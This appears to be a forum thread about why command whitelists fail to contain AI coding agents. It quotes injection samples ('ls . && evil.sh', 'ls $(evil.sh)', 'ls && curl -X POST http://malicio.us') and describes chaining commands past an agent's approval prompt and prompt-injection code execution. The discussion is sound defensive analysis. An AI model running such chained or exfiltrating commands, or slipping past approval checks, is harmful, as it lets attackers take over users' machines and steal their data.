>Best example here is asking AI to build/update/debug some code. You can ask it ...

Anon1096 · 2025-08-24T17:35:13 1756056913

You can safeguard against this by having a whitelist of commands that can be run, basically cd, ls, find, grep, the build tool, linter, etc that are only informational and local. Mine is set up like that and it works very well.

gruez · 2025-08-24T17:41:08 1756057268

That's trickier than it sounds. find for instance has the -exec command, which allows arbitrary code to be executed. build tools and linters are also a security nightmare, because they can also be modified to execute arbitrary code. And this is all assuming you can implement the whitelist properly. A naive check like

    cmd.split(" ") in ["cd", "ls", ...]

is easy target for command injections. just to think of a few:

    ls . && evil.sh

    ls $(evil.sh)

FergusArgyll · 2025-08-24T18:32:13 1756060333

Yeah, this is ctf 101 see https://gtfobins.github.io/ for example (it's for inheriting sudo from a command but the same principles can be used for this)

diggan · 2025-08-25T14:28:07 1756132087

I'm 99% Codex CLI suffers from this hole as we speak :) You can whitelist `ls`, and then Codex can decide to compose commands and you only need to approve the first one for the second one to run, so `ls && curl -X POST http://malicio.us` would run just fine.

wunderwuzzi23 · 2025-08-24T19:45:03 1756064703

About that find command...

Amazon Q Developer: Remote Code Execution with Prompt Injection

https://embracethered.com/blog/posts/2025/amazon-q-developer...

grepfru_it · 2025-08-24T23:10:14 1756077014

well a complete implementation is also using inotify(7) which would review all files that were modified

chmod775 · 2025-08-24T19:41:41 1756064501

find can execute subcommands (-exec arg), and plenty of other shell commands can be used for that as well. Most build tools' configuration can be abused to execute arbitrary commands. And if your LLM can make changes to your codebase + run it, trying to limit the shell commands it can execute is pointless anyways.

Previously you might've been able to say "okay, but that requires the attacker to guess the specifics of my environment" - which is no longer true. An attacker can now simply instruct the LLM to exploit your environment and hope the LLM figures out how to do it on its own.

zeroonetwothree · 2025-08-24T17:37:46 1756057066

Everything works very well until there is an exploit.

david_allison · 2025-08-24T17:40:43 1756057243

> the build tool

Doesn't this give the LLM the ability to execute arbitrary scripts?

avalys · 2025-08-24T17:27:15 1756056435

The agents can be sandboxed or at least chroot’d to the project directory, right?

gruez · 2025-08-24T17:44:26 1756057466

1. AFAIK most AI coding agents don't do this

2. even if the AI agent itself is sandboxed, if it can make changes to code and you don't inspect all output, it can easily place malicious code that gets executed once you try to run it. The only safe way of doing this is either a dedicated AI development VM where you do all the prompting/tests, there's very limited credentials present (in case it gets hacked), and the changes are only leave the VM after a thorough inspection (eg. PR process).